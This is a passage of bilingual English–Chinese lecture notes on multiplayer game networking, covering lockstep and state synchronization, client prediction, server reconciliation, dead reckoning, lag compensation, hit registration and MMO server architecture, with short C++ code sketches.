
      • Small buffer, sensitive to lag

        小缓冲区,对延迟敏感

    webp

    Separating Game Logic from Rendering

    将游戏逻辑与渲染分离

    Lag problem

    滞后问题

    • Separation of logic and rendering

      逻辑与渲染的分离

    • Local client-side interpolation smoothing

      本地客户端插值平滑

    Frame rate

    帧率

    • The logical frame rate is generally 10~30 frames

      逻辑帧率一般为 10~30 帧

    • The rendering frame rate is generally higher

      渲染帧率通常较高

    webp

    Advantage

    优势

    • Different frequencies, independent operation

      不同频率,独立运行

    • Rendering separation to avoid tearing and freezing

      渲染分离以避免撕裂和冻结

    • Rendering freezes, does not affect the operation of logical frames

      渲染冻结,不影响逻辑帧的操作

    • Servers can run logic frames to solve some cheating problems

      服务器可以运行逻辑框架来解决一些作弊问题

    • If the server runs logical frames, it can save key frame snapshots to speed up reconnection

      如果服务器运行逻辑帧,它可以保存关键帧快照以加快重新连接

    Reconnection Problem

    重新连接问题

    • Offline

      离线

    • Reconnect

      重新连接

    • Catch up

      赶上

    webp

    Client Game State Snapshots

    客户端游戏状态快照

    • Snapshots can be saved regularly on the local client and serialized to disk

      快照可以定期保存在本地客户端上并序列化到磁盘

    • When reconnection occurs, restore thegame state from the disk serialized data

      重新连接时,从磁盘序列化数据还原游戏状态

    • Server sends player commands after snapshot

      服务器在快照后发送玩家命令

    • Accelerate to catch up with the game progress

      加速以赶上游戏进度

    webp

    Quick Catch Up

    快速赶上

    How to catch up?

    如何迎头赶上

    • In the sample code, chasing 10 frames each time

      在示例代码中,每次追踪 10 帧

    • If originally 10 frames per second, when chasing frames, it may run 100 frames per second

      如果最初每秒 10 帧,在追逐帧时,它可能每秒运行 100 帧

float m_delta = 0;
float m_tick_delta = 100;

void CBattleLayer::update(float delta) {
    // do something
    m_delta += delta;
    int exec_count = 1;
    while (m_delta >= m_tick_delta) {
        m_delta -= m_tick_delta;
        // logic frame
        if (!logicUpdate(LOGIC_TIME)) {
            return;
        }
        // catch up 10 frames at a time
        if (exec_count++ >= 10) {
            break;
        }
    }
    // do something
}

    Server State Snapshot Optimization

    服务器状态快照优化

    • The server runs logical frames and saves snapshots of keyframes

      服务器运行逻辑帧并保存关键帧的快照

    • The server sends the snapshot, and the player commands after the snapshot

      服务器发送快照,玩家在快照后发出命令

    • Accelerate to catch up with the game progress

      加速以赶上游戏进度

    webp

    Temporary Offline, No Crash

    暂时离线,无崩溃

    • Client also keeps game state, keyframes, deterministic-timed frames

      客户端还保留游戏状态、关键帧、确定性定时帧

    • After reconnecting, the server sends commands to the dropped player

      重新连接后,服务器向掉线的玩家发送命令

    • Accelerate to catch up the game progress

      加速以赶上游戏进度

    webp

    Observing

    观察

    Watching other players playing the game

    观看其他玩家玩游戏

    • Reconnecting and watching are essentially the same

      重新连接和观看基本上是一样的

    • Watching is similar to reconnecting after a client crash

      观战类似于在客户端崩溃后重新连接

    • Player action command, forwarded to the player watching the game

      玩家动作命令,转发给观看游戏的玩家

    • Watching is usually delayed for a few minutes to prevent screen peeping

      观看通常会延迟几分钟,以防止偷看屏幕

    webp

    Replay

    重播

    Execute player commands in order; execution can be accelerated

    按顺序执行玩家命令,并且执行可以加速

    • Replay file

      回放文件

      • Save game commands for a game

        保存一局游戏的命令

      • Files take up little space

        文件占用的空间很小

    • How to implement going back?

      如何实现回退?

      • When the client executes the replay file, it adds a key frame snapshot, which can go back to the key frame moment

        当客户端执行回放文件时,它会添加一个关键帧快照,该快照可以返回到关键帧时刻

      • The current version of Honor of Kings can go back to the key frame up to 60s earlier

        当前版本的《王者荣耀》可以回退到 60 秒前的关键帧

    webp

    Lockstep Cheating Issues

    锁步作弊问题

    Multiplayer-PVP

    多人 PVP

    • Game over

      游戏结束

      • The client uploads the key data checksum, the server verifies the game result

        客户端上传关键数据校验和,服务器验证游戏结果

    • During the game

      在游戏过程中

      • Report the key data checksum

        报告关键数据校验和

      • Cheating players are kicked out, etc.

        作弊的玩家被踢出等等。

    webp

    2 Players

    2 名玩家

    • Server cannot detect who is cheating using the key data checksum

      服务器无法使用关键数据校验和检测谁在作弊

    • If the server does not verify, a cheating player will only affect one other player in this case

      如果服务器不做验证,作弊玩家在这种情况下也只会影响一名玩家

    webp

    • Difficult to prevent third-party plug-ins from accessing fog-of-war or other hidden data

      难以避免第三方插件访问战争迷雾或其他隐藏数据

      • Game logic is performed on the client side

        游戏逻辑在客户端执行

      • Clients have all the game data

        客户端拥有所有游戏数据

    webp

    Lockstep Summary

    锁步同步总结

    Advantages

    优势

    • Low bandwidth, only sends commands

      带宽低,只发送命令

    • High development efficiency, similar to single-player game development

      开发效率高,类似单人游戏开发

    • Precise action/hit detection

      精确的动作/命中检测

    • Easy to record games

      易于录制游戏

    Problems

    问题

    • Maintaining consistency is difficult to achieve

      保持一致性很难实现

    • Hard to stop cheat plugins from unveiling all game states

      难以阻止作弊插件获取所有游戏状态

    • Longer disconnection and reconnection time

      更长的断开和重新连接时间

      • Need more complex optimization

        需要更复杂的优化

    State Synchronization

    状态同步

    webp

    Replication Protocol of Halo

    Halo 的同步协议

    webp

    State Data 状态数据

    • Guaranteed eventual delivery of most current state

      保证最终交付最新状态

      • Object position 对象位置
      • Object health 对象生命
      • 150+ properties 150+ 个属性

    Events 事件

    • Unreliable notifications of transient occurrences

      不可靠的瞬态事件通知

      • Please fire my weapon 请发射我的武器
      • This weapon was fired 此武器已被发射
      • Projectile detonated 弹丸被引爆
      • More events 更多事件

    Control Data 控制数据

    • High-frequency, best-effort transmission of rapidly-updated data extracted from player control inputs

      高频、尽最大努力传输从玩家控制输入中提取的快速更新数据

      • Current analog stick values for all players 所有玩家的当前模拟摇杆值
      • Current position of client's own biped 客户端自己角色的当前位置
      • More properties 更多属性

    State

    状态

    • The game state is the data necessary to represent the game world, e.g. HP, MP

      游戏状态是代表游戏世界所必需的。例如:血量、法力

    State Synchronization

    状态同步

    • Server does not generate a single update for all clients. It sends each client a customized data packet

      服务器不会为所有客户端生成单一更新。它向每个客户端发送定制的数据包

    • If the game world is too complex, you can set an Area Of Interest (AOI) for reducing server overhead

      如果游戏世界太复杂,您可以设置一个兴趣区域(AOI)来减少服务器开销

    Server Authorizes the Game World

    服务器授权游戏世界

    Server

    服务器

    • Game world is authoritative

      游戏世界以服务器为权威

    • Receive input and state from client

      从客户端接收输入和状态

    • Run game logic

      运行游戏逻辑

    • Send state

      发送状态

    Client

    客户端

    • Receive data and simulate game world

      接收数据并模拟游戏世界

    • Game play improvement

      游戏玩法改进

    webp

    Authorized and Replicated Clients

    授权和同步客户端

    Authorized (1P)

    授权(1P)

    • Player’s local game client

      玩家的本地游戏客户端

    Server

    服务器

    • Authorized server

      授权服务器

    Replicated (3P)

    已同步(3P)

    • Simulated character in other player’s client

      其他玩家客户端中的模拟角色

    webp

    State Synchronization Example

    状态同步示例

    Player1 (Authorized)

    玩家 1(授权)

    • Fire

      开火

    Player2 (Replicated)

    Player2(已同步)

    • See player1 open fire

      看到玩家 1 开火


    Player 1 presses an input on their local machine to fire

    玩家 1 按下本地机器上的输入进行射击

    Player1 (Authorized)

    玩家 1(授权)

    • Fire

      开火

    • Send to server

      发送到服务器

    Server

    服务器

    • Player1 fire

      玩家 1 开火

    • Send to each client

      发送给每个客户端

    Player2 (Replicated)

    玩家 2(已同步)

    • Receive packet

      接收数据包

    • Player1 fire

      玩家 1 开火


    Server

    服务器

    Tell each client to replicate the movement of Player 1’s projectile.

    告诉每个客户端同步玩家 1 投射物的运动。


    Server

    • Tell each client to destroy their copies of Player 1’s projectile

      告诉每个客户端销毁其玩家 1 投射物的副本

    • Tell all clients to respond to the damage of the projectile

      告诉所有客户端对投射物造成的伤害做出反应

    Dumb Client Problem

    哑巴客户端问题

    Clients cannot do anything until they receive a server state update

    在收到服务器状态更新之前,客户端无法执行任何操作

    How to see an immediate response?

    如何看到即时响应?

    • Client-side prediction

      客户端预测

    • Server reconciliation

      服务器对账

    webp

    Client-Side Prediction

    客户端预测

    Authorized client

    授权客户端

    • Press “→”

      按“→”

    • Received server message

      收到服务器消息

    • Start movement

      开始移动

    webp

    Overwatch - Client-side Prediction

    守望先锋-客户端预测

    • RTT = 160ms

      RTT = 160 毫秒

    • Half RTT = 80ms

      半 RTT = 80 毫秒

    • Command frame = 16ms

      命令帧 = 16ms

    The client is always ahead of the server by half RTT and one buffered command frame

    客户端始终领先于服务器一半的 RTT 和一个缓冲命令帧

    • Press key and response immediately

      按键并立即响应

    webp

    Server Reconciliation

    服务器对账

    Authorized client: Buffer

    授权客户端:缓冲区

    • Record every state when doing client prediction

      在进行客户端预测时记录每个状态

    • Compare with the past server data when it was received on client side

      与客户端接收到的过去服务器数据进行比较


    Ring buffer for states

    状态环形缓冲区

    • Stores all of our states in the past several frames on client

      将过去几帧中的所有状态存储在客户端上

    Process

    流程

    • If the client computed the same result as server, the client will continue on its merry way to simulate the next input

      如果客户端计算出的结果与服务器相同,客户端将继续愉快地模拟下一个输入

    Problem

    问题

    • What if we mispredict?

      如果预测失误了呢?

    webp


    • If blocked by an obstacle at the server

      如果被服务器上的障碍物阻挡

    • Position is wrong! (in red)

      位置不对!(红色)

    • Client must accept the new server update

      客户端必须接受新的服务器更新

    • Retrace all predicted movement starting from the new confirmed position

      从新的确认位置开始回溯所有预测的运动

    webp


    • If the client and server disagree on the results, we’ve mispredicted

      如果客户端和服务器对结果不一致,我们就预测错了

    • Have to reconcile

      必须和解

    Ring buffer for inputs

    用于输入的环形缓冲区

    • Stores all of the inputs we made in the past several frames on the client.

      在客户端上存储我们在过去几帧中所做的所有输入。

    Process

    流程

    • Overwrite the client's results with the server's results

      用服务器的结果覆盖客户端的结果

    • Replay all of your inputs to catch back up to what you believe now

      重放所有输入,追赶回客户端当前认为正确的状态

    webp
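
    A minimal sketch of this reconciliation loop, assuming illustrative Input/State types, fixed-size ring buffers, and a trivially simple applyInput() simulation step:

    // Minimal sketch: client-side prediction with server reconciliation.
    #include <array>
    #include <cmath>
    #include <cstdint>

    struct Input { float moveX, moveY; };
    struct State { float x, y; };

    constexpr size_t kBufferSize = 64; // covers the last 64 command frames

    std::array<State, kBufferSize> stateBuffer; // predicted states, ring buffer
    std::array<Input, kBufferSize> inputBuffer; // past inputs, ring buffer

    State applyInput(const State& s, const Input& in) {
        return { s.x + in.moveX, s.y + in.moveY }; // trivially simple "simulation"
    }

    // Called when an authoritative state for `serverFrame` arrives on the client.
    void reconcile(uint32_t serverFrame, uint32_t currentFrame, const State& serverState) {
        State& predicted = stateBuffer[serverFrame % kBufferSize];
        bool mispredicted = std::fabs(predicted.x - serverState.x) > 1e-4f ||
                            std::fabs(predicted.y - serverState.y) > 1e-4f;
        if (!mispredicted) return; // same result: continue simulating the next input

        // Accept the server's result, then replay the buffered inputs.
        State s = serverState;
        stateBuffer[serverFrame % kBufferSize] = s;
        for (uint32_t f = serverFrame + 1; f <= currentFrame; f++) {
            s = applyInput(s, inputBuffer[f % kBufferSize]);
            stateBuffer[f % kBufferSize] = s;
        }
    }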

    Server Reconciliation Example

    服务器对账示例

    Overwatch

    守望先锋

    • We try to move

      我们试图移动

    • The server said no

      服务器拒绝了

    • We got yanked back down to where we were before and froze

      我们被拉回到原来的位置,然后僵住了

    webp

    Packet Loss

    数据包丢失

    • Client input packages fail to reach the server

      客户端输入包无法到达服务器

    • The server tries to keep a tiny buffer of unprocessed input

      服务器试图保留未处理输入的微小输入缓冲区

    • If the server runs out of buffered input, it will duplicate your last input within a small window

      如果服务器的输入缓冲区用尽,它会在一个小窗口内复制您的最后一次输入

    • Push the client to send the missed inputs ASAP

      推送客户端尽快发送丢失的输入

    webp

    State Synchronization Vs. Lockstep Synchronization

    状态同步与锁步同步对比

    |  | State Synchronization 状态同步 | Lockstep Synchronization 锁步同步 |
    | --- | --- | --- |
    | Deterministic logic 确定性逻辑 | Not necessary 不需要 | Necessary 必要 |
    | Response 响应 | Better responsiveness 响应性更好 | Poor responsiveness 响应性差 |
    | Network traffic 网络流量 | Usually high 通常较高 | Usually low 通常较低 |
    | Development efficiency 开发效率 | Much more complicated 复杂得多 | Easy to develop, difficult to debug 易于开发,难以调试 |
    | Number of players 玩家数量 | Few players 玩家较少 | Supports small and large numbers of players 支持小规模和大规模玩家 |
    | Cross-platform 跨平台 | Relatively easy 相对容易 | Relatively difficult 相对困难 |
    | Reconnect 重连 | Relatively easy 相对容易 | Relatively difficult 相对困难 |
    | Replay file size 回放文件大小 | Big 大 | Small 小 |
    | Cheat 作弊 | Relatively hard 相对困难 | Relatively easy 相对容易 |

    References

    Network Protocols

    Network Synchronization

    第十九节:网络游戏的进阶架构

    Online Gaming Architecture - Advanced Topics

    Character Movement Replication

    角色动作同步


    From player 2’s point of view, player1’s movement is very choppyand lags behind player1’s actual position.

    从玩家 2 的角度来看,玩家 1 的动作非常不稳定,落后于玩家 1 的实际位置。

    Interpolation & Extrapolation

    内插值和外插值

    Purpose: Smooth movement of players' characters on screen

    目的:玩家角色在屏幕上流畅移动

    Interpolation

    内插值

    • Calculate the state between old but known states

      计算旧但已知状态之间的状态

    webp

    Extrapolation

    外插值

    • Predict where entity is going from old states

      预测实体从旧状态走向何方

    webp

    Smooth States by Interpolations

    插值平滑状态

    • Position and orientation can be interpolated between the two most recently received updates

      位置和方向可以在最近接收到的两个数据之间进行插值

    Buffer States and Deferred Render

    缓冲区状态和延迟渲染

    • Data packet will not be rendered immediately when received

      数据包在收到后不会立即呈现

    • Put into memory and wait for a new data packet

      放入内存并等待新的数据包

    • After waiting for a time offset, start to render first received data packet

      等待时间偏移后,开始渲染第一个接收到的数据包

    • Create an artificial delay of interpolation offset

      创建插值偏移的人工延迟

    webp
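
    A minimal sketch of buffered interpolation with a deferred render time (the Snapshot layout and the 100 ms offset are illustrative assumptions):

    #include <cstddef>
    #include <deque>

    struct Snapshot { double time; float x, y; }; // received state updates

    std::deque<Snapshot> snapshots; // kept in arrival (time) order

    float lerp(float a, float b, float t) { return a + (b - a) * t; }

    // Render at now - offset so there are usually two snapshots to blend between.
    bool sampleSmoothedPosition(double now, float& outX, float& outY) {
        const double kInterpolationOffset = 0.1; // artificial delay, e.g. 100 ms
        double renderTime = now - kInterpolationOffset;
        for (size_t i = 0; i + 1 < snapshots.size(); i++) {
            const Snapshot& a = snapshots[i];
            const Snapshot& b = snapshots[i + 1];
            if (a.time <= renderTime && renderTime <= b.time) {
                float t = static_cast<float>((renderTime - a.time) / (b.time - a.time));
                outX = lerp(a.x, b.x, t);
                outY = lerp(a.y, b.y, t);
                return true;
            }
        }
        return false; // not enough buffered data yet: keep waiting (or extrapolate)
    }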

    Character Movement Replication by Interpolation

    通过插值同步角色动作

    Result after interpolation was implemented

    插值后的结果

    Interpolation Challenges of Vehicle Movement Replication

    车辆运动同步的插值挑战

    webp

    Estimate Current State by Extrapolation

    通过外推法估计当前状态

    • Use past states to estimate the current state to compensate for network lag

      使用过去的状态来估计当前状态,以补偿网络延迟

    Dead Reckoning

    航位推测(Dead Reckoning)

    • Estimate future state based on states that have been received

      根据已收到的状态估计未来状态

    webp

    Projective Velocity Blending

    投影速度混合

    • At $t_0$, the replicated character is at $p_0$ with velocity $v_0$ and acceleration $a_0$, and receive the
      synced states with position $p’_0$, velocity $v’_0$, acceleration $a’_0$

      在时间 $t_0$,同步的角色位于 $p_0$,其速度为 $v_0$,加速度为 $a_0$,并接收到同步的状态,其位置为 $p’_0$,速度为 $v’_0$,加速度为 $a’_0$。

    • We can predict position $p’_t$ after a time duration $t$ based the synced states

      我们可以根据同步的状态预测在时间持续 $t$ 后的位置 $p’_t$。

    $$p’_t=p’_0+v’_0t+\frac{1}{2}a’_0t^2$$

    • Our goal is to reach $p'_t|_{t=t_B}$ smoothly after a fixed blending time duration: $t_B-t_0$

      我们的目标是在固定的混合时长 $t_B - t_0$ 后平滑地到达 $p'_t|_{t=t_B}$。

    webp

    At any time $t$, we can get the blending velocity $v_t$

    在任何时刻 $t$,我们可以得到混合速度 $v_t$

    $$\lambda=\frac{t-t_0}{t_B-t_0}$$

    $$v_t=v_0+\lambda(v’_0-v_0)$$

    And projecting the position $p_t$ from $p_0$

    并从 $p_0$ 投影位置 $p_t$

    $$p_t=p_0+v_tt+\frac{1}{2}a’_0t^2$$

    Then get the dead reckoned position $p_d$ by combining $p_t$ and $p’_t$

    然后通过结合 $p_t$ 和 $p’_t$ 得到估算位置 $p_d$

    $$p_d=p_t+\lambda(p’_t-p_t)$$
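
    A minimal sketch of these formulas in code (the Vec3 helper and State layout are illustrative, not a specific engine's types):

    struct Vec3 {
        float x, y, z;
        Vec3 operator+(const Vec3& o) const { return { x + o.x, y + o.y, z + o.z }; }
        Vec3 operator-(const Vec3& o) const { return { x - o.x, y - o.y, z - o.z }; }
        Vec3 operator*(float s) const { return { x * s, y * s, z * s }; }
    };

    struct State { Vec3 p, v, a; }; // position, velocity, acceleration

    // local:  replica state at t0 (p0, v0, a0)
    // synced: freshly received server state (p'0, v'0, a'0)
    // t: time elapsed since t0;  tB: the fixed blending duration (tB - t0)
    Vec3 deadReckonedPosition(const State& local, const State& synced, float t, float tB) {
        float lambda = t / tB;                        // lambda = (t - t0) / (tB - t0)
        if (lambda > 1.0f) lambda = 1.0f;

        Vec3 v_t = local.v + (synced.v - local.v) * lambda;              // blended velocity
        Vec3 p_t  = local.p  + v_t * t      + synced.a * (0.5f * t * t); // projected from p0
        Vec3 p_pt = synced.p + synced.v * t + synced.a * (0.5f * t * t); // predicted p'_t
        return p_t + (p_pt - p_t) * lambda;                              // dead reckoned p_d
    }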

    webp

    Collision Issues

    碰撞问题

    Dead reckoning collision trajectory looks weird

    航位推测的碰撞轨迹看起来很奇怪

    Phase 1: Collision starts

    **第一阶段:**碰撞开始

    Phase 2: The replica keeps going, since the extrapolation is based on the last snapshot

    **第二阶段:**副本继续前进,因为外推是基于最后一次快照

    Phase 3: Finally we receive a snapshot to stop the replica, but the replica gives the master's rigidbody a huge velocity, pushing the master away

    **第三阶段:**最后我们收到一个快照来停止副本,但副本会给主体的刚体一个巨大的速度,把主体推开

    Physics Simulation Blending During Collision

    碰撞过程中的物理模拟混合

    Tunable between two states

    可在两个状态之间调整

    • State calculated by the client physics simulation

      客户端物理模拟计算的状态

    • State that tries to reach the dead reckoned positions

      试图到达航位推测位置的状态

    webp

    Tuned blending factors from Watch Dogs 2, Ubisoft Toronto. Bikes recover faster than cars

    调整了育碧多伦多《看门狗 2》的混合因子。自行车的恢复速度比汽车快。

    Usage Scenario of Interpolation

    插值使用场景

    Scenario for Using Interpolation

    使用插值的场景

    • Characters’ movement are very non-deterministic with high acceleration

      角色在高加速度下的运动非常不确定

    • Gameplay suffers from the “wrap”when extrapolation errors occur

      当出现外推错误时,游戏玩法会受到“包装”的影响

    Typical examples

    典型示例

    • FPS
    • MOBA

    webp

    Usage Scenario of Extrapolation

    外推法使用场景

    Scenario for Using Extrapolation

    使用外推法的场景

    • Player movement uses a realistic physical model

      玩家动作使用逼真的物理模型

    • Gameplay suffers from latency due to network transmission

      游戏因网络传输而延迟

    Typical examples

    典型示例

    • Racing game. Vehicle systems (Tanks, Ships, etc.)

      赛车游戏。载具系统(坦克、船舶等)

    webp

    Blend Scenario of Interpolation and Extrapolation

    插值和外推的混合场景

    Sometimes we need to apply both interpolation and extrapolation for the game to work properly

    有时我们需要同时应用插值和外推法才能使游戏正常工作

    • Apply Extrapolation on vehicles

      对车辆应用外推法

    • Apply Interpolation for characters

      对角色应用插值

    • Do extrapolation if not enough data received

      如果没有收到足够的数据,则进行外推

    webp

    Hit Registration

    命中注册

    How to Make a Headshot in Online Game

    如何在网络游戏中打出爆头

    Network messages take time to travel from client to server, and interpolation causes you to see the enemy lagging behind

    网络消息从客户端传到服务器需要时间,插值会导致你看到的敌人位置落后

    webp

    Where is the Enemy?

    敌人在哪里?

    Due to latency, interpolation offset and time delay, you'll see other players slightly behind their current server positions. Where should I shoot?

    由于延迟、插值偏移和时间延迟,你会看到其他玩家稍微落后于他们当前的服务器位置。我应该朝哪里开枪?

    Where Should I Shoot?

    我应该在哪里开枪?

    webp

    Hit Registration

    命中注册

    Hit registration is making a consensus of all players on whether you've actually hit your enemy

    命中注册是让所有玩家就你是否真的击中了敌人达成共识。

    webp

    • Detecting hit event on client-side with replicated character positions

      通过同步角色位置在客户端检测命中事件

    • Send hit events to the server

      将命中事件发送到服务器

    • Server runs simple verification

      服务器运行简单验证

    webp

    A Comparison of Hitscan Weapons versus Projectile Weapons

    Hitscan 武器与投射武器的比较

    Unlike hitscan weapons, projectile weapons can also simulate the effect of gravity

    与 Hitscan 武器不同,投射式武器还可以模拟重力的影响

    webp

    The scenery in Battlefield is built from several hitboxes, so destruction can take away walls, floors, etc.

    《战地》中的场景是由几个 hitbox 构建的,因此破坏可以带走墙壁、地板等。

    webp

    • Hitscan hits the target immediately after the shot is fired

      Hitscan 发射射弹后立即击中目标

    • Projectile takes some time to hit the target after it is fired

      Projectile 发射射弹后需要一定时间才可击中目标

    A Very Simple Server Verification of Hit Event

    一种非常简单的服务器命中事件验证

    • Client sends hit event with complete ray information to the server

      客户端向服务器发送包含完整射线信息的命中事件

      • StartPoint, HitPoint and HitObject of the raycast

        光线投射的起点(StartPoint)、命中点(HitPoint)和命中对象(HitObject)

    • Validate whether the StartPoint is really close enough to the shooter

      验证起点是否真的足够接近射击者

    • Validate whether the HitPoint really belongs to the HitObject

      验证 HitPoint 是否真的属于 HitObject

    • Ensure nothing is blocking along the path by casting a ray from the StartPoint to the HitPoint

      通过从起点向命中点投射光线,确保路径上没有任何遮挡

    In a real game, the server verification is VERY TRICKY AND COMPLICATED

    在真实游戏中,服务器验证非常棘手和复杂
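
    A minimal sketch of the simple verification steps above (the isPointOnObject/raycast helpers stand in for the server's physics queries and are assumptions, not a specific engine API):

    #include <cmath>

    struct Vec3 { float x, y, z; };
    struct HitEvent { Vec3 start, hitPoint; int hitObjectId; };
    struct RaycastResult { int objectId; };

    // Assumed to be provided by the server's physics world:
    bool isPointOnObject(const Vec3& p, int objectId);
    RaycastResult raycast(const Vec3& from, const Vec3& to);

    constexpr float kMaxMuzzleOffset = 2.0f; // illustrative threshold (meters)

    float distance(const Vec3& a, const Vec3& b) {
        float dx = a.x - b.x, dy = a.y - b.y, dz = a.z - b.z;
        return std::sqrt(dx * dx + dy * dy + dz * dz);
    }

    bool verifyHit(const HitEvent& ev, const Vec3& shooterPos) {
        // 1. The StartPoint must be close enough to the shooter.
        if (distance(ev.start, shooterPos) > kMaxMuzzleOffset) return false;
        // 2. The HitPoint must really belong to the claimed HitObject.
        if (!isPointOnObject(ev.hitPoint, ev.hitObjectId)) return false;
        // 3. Nothing may block the path from StartPoint to HitPoint.
        return raycast(ev.start, ev.hitPoint).objectId == ev.hitObjectId;
    }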

    Server Verification Has to Guess

    服务器验证必须猜测

    webp

    Problem of Client-Side Hit Detection

    客户端命中检测问题

    Efficient and Precise

    高效精准

    • Very efficient for hit detection without huge server workload

      非常有效的命中检测,无需巨大的服务器工作负载

    • Best shooting experience with pixel precision

      像素级精度的最佳射击体验

    Unsafe for cheating

    易于玩家作弊

    • Fake hit event messages

      伪造命中事件消息

    • Lag switches

      滞后开关

    • Infinite ammo

      无限弹药

    Detecting Hit on Server-Side?

    检测服务器端的命中?

    Client doesn’t know the target current location on server

    客户端不知道服务器上的目标当前位置

    webp

    Lag Compensation

    滞后补偿

    Server-side state rewinding to compensate network lags when player’s commands are executed

    服务器端状态倒带,以补偿执行玩家命令时的网络延迟

    • Get information from clients

      从客户那里获取信息

    • Rewind the game state to the cached snapshot that matches the client's action time

      回退到与客户端操作时间匹配的缓存状态快照

    • Run the client operation in the rewound game state

      在回退后的游戏状态中执行客户端操作

    webp

    Compensate all Possible Lags

    补偿所有可能的延迟

    • RewindTime = Current Server Time - Packet Latency - Client View Interpolation Offset (see the sketch below)

      RewindTime = 当前服务器时间 - 数据包延迟 - 客户端视图插值偏移(见下面的示意代码)
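
    A minimal sketch of picking the snapshot to rewind to, assuming a time-ordered snapshot history (the types are illustrative):

    #include <deque>

    struct WorldSnapshot { double serverTime; /* cached hitboxes of all players */ };

    std::deque<WorldSnapshot> history; // snapshots cached for the last second or so

    const WorldSnapshot* findRewindSnapshot(double serverNow,
                                            double packetLatency,
                                            double interpOffset) {
        // RewindTime = Current Server Time - Packet Latency - Interpolation Offset
        double rewindTime = serverNow - packetLatency - interpOffset;
        const WorldSnapshot* best = nullptr;
        for (const WorldSnapshot& s : history) {
            if (s.serverTime <= rewindTime) best = &s; // latest snapshot not newer
            else break;                                // history is time-ordered
        }
        return best; // run the client's shot against this rewound state
    }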

    webp

    webp

    Actor: Enemy’s client state

    角色:敌人的客户端状态

    Red collision box: Enemy in the player’s view

    红色碰撞框:玩家视野中的敌人

    Blue collision box: Rewound server state

    蓝色碰撞框:回退后的服务器状态

    Cover Problems – Running into Cover

    掩体问题——遇到掩体

    webp

    The victim is still hit after reaching cover because of network latency: shooter's advantage.

    被击中者躲到掩体后因为网络延迟仍被击中,即射手优势(Shooter's advantage)。

    Cover Problems – Coming out from Cover

    掩体问题——从掩体中出来

    webp

    The player coming out from cover is not hit because of network latency: peeker's advantage.

    被攻击者从掩体出来因网络延迟未被击中,即探头优势(Peeker's advantage)。

    Startup Frames to Ease Latency Feeling

    启动帧(前摇)缓解延迟感

    • A fixed animation before attack or move can also eliminate the effect of lag from network transmission

      攻击或移动前的固定动画(技能前摇)也可以消除网络传输延迟的影响

    • Players will keep their attention on animations and ignore the state delay

      玩家将注意力集中在动画上,忽略状态延迟

    webp

    Local Forecast VFX Impacts

    本地预测 VFX 影响

    • Clients can perform local hit tests in order to give the player some instant feedback, such as displaying a blood splatter visual effect

      客户端可以执行本地命中测试,以便为玩家提供一些即时反馈,例如显示血溅的视觉效果

    • However, any permanent effects of the hits, such as reducing the hit points of a player, are only applied after receiving confirmation from the server

      但是,只有在收到服务器的确认后,才会应用命中的永久性效果,例如扣除玩家的生命值

    MMOG Network Architecture

    MMOG 网络架构

    What is MMOG?

    什么是 MMOG?

    MMOG: Massively Multiplayer Online Game, or more commonly MMO

    MMOG:大型多人在线游戏,或更常见的 MMO

    MMOs with a large number of players, often hundreds or thousands, on the same server can enable players to cooperate and compete with each other on a large scale, and include a variety of gameplay types (MMORPG, MMORTS, MMOFPS, etc.)

    在同一台服务器上拥有大量玩家(通常是数百或数千人)的 MMO 可以使玩家能够大规模地相互合作和竞争,并包括各种游戏类型(MMORPG、MMORTS、MMOFPS 等)

    webp

    webp

    Diversities of Modern MMO

    现代 MMO 的多样性

    webp

    Game Sub-Systems

    游戏子系统

    MMOs have a variety of gameplay and are supported by many sub-systems

    MMO 具有多种游戏玩法,并得到许多子系统的支持

    • User management

      用户管理

    • Matchmaking

      配对

    • Trading system

      交易系统

    • Social system

      社交系统

    • Data storage

      数据存储

    MMO Architecture

    MMO 架构

    webp

    Link Layer Services

    链路层服务

    Login Server

    登录服务器

    • Verification of client connection

      客户端连接验证

    Gateway

    网关

    • Very important layer to separate inside/outside networks

      分隔内部/外部网络的非常重要的层

    webp

    Lobby

    大厅

    • Players can gather in the lobby, see and interact with other players

      玩家可以聚集在大厅,观看并与其他玩家互动

    • When the number of players continues to increase, it is a challenge to the performance of the server and the client

      当玩家数量持续增加时,服务器和客户端的性能都会受到挑战

    webp

    Character Server

    角色服务器

    All player data is managed in one system. Such as account info, character info, backpack info, mail info, etc.

    所有玩家数据都在一个系统中管理。如账户信息、人物信息、背包信息、邮件信息等。

    webp

    Trading System

    交易系统

    • Buying and selling items on the marketplace

      在市场上买卖商品

    • Sending items or coins to other players through the in-game Mail

      通过游戏内邮件向其他玩家发送物品或硬币

    • Game designers need to keep an eye on market prices to prevent imbalances

      游戏设计师需要关注市场价格,以防止不平衡

    • For a persistent world to maintain a stable economy, a balance must be struck between currency sources and sinks

      为了让持久世界维持稳定的经济,必须在货币的产出(sources)与消耗(sinks)之间取得平衡

    • Players can use real-world money to buy a specific in-game item

      玩家可以用现实世界的钱购买特定的游戏内物品

    webp

    Social System

    社交系统

    • Player-to-player interplay and communication

      玩家之间的互动和沟通

    • Foster stronger social cohesion in-game

      在游戏中培养更强的社会凝聚力

    webp

    Matchmaking

    配对

    • You have to consider attributes like skills, level, latency, wait time…

      你必须考虑技能、级别、延迟、等待时间等属性…

    • In general, making a good matchmaking service is core for a game design

      一般来说,提供良好的配对服务是游戏设计的核心

    • Running this on a global scale for your player population presents a whole different set of challenges

      在全球范围内为您的玩家群体运行此功能会带来一系列完全不同的挑战

    webp

    Data Storage

    数据存储

    The game data is very complex and diverse

    游戏数据非常复杂和多样化

    • Player data (guilds, dungeons, warehouse, etc.)

      玩家数据(公会、地下城、仓库等)

    • Monitoring data

      监测数据

    • Mining data

      数据挖掘

    Data needs to be securely persisted and efficiently organized for retrieval and analysis, etc.

    数据需要安全地持久化,并有效地组织起来进行检索和分析等。

    webp

    Relational Data Storage

    关系数据存储:MySQL

    • Requires Structure to be Predetermined

      需要预先确定结构

    • Flexible Queries

      灵活的查询

    • Always Consistent

      始终保持一致

    Game Development Examples

    游戏开发示例

    • Player Data

      玩家数据

    • Game Data

      游戏数据

    • Inventory

      库存

    • Item Shops/Trading

      商品商店/贸易

    Non-Relational Data Storage

    非关系数据存储:MongoDB

    • Structure Can Change For Each Entry

      每个条目的结构都可能发生变化

    • Queries Have Higher Specificity

      查询具有更高的特异性

    • May Not Always Be Consistent

      可能并不总是一致的

    Game Development Examples

    游戏开发示例

    • Player/Item Stats/Profile Game Data

      玩家/物品统计/个人资料游戏数据

    • Enchantments and Upgrades

      附魔和升级

    • Game States

      游戏状态

    • Quest Data

      任务数据

    In-Memory Data Storage

    内存数据存储:redis

    • Extremely Fast (Memory versus Hard Disk)

      极快(内存与硬盘)

    • Key-Value

      键值存储(Key-Value)

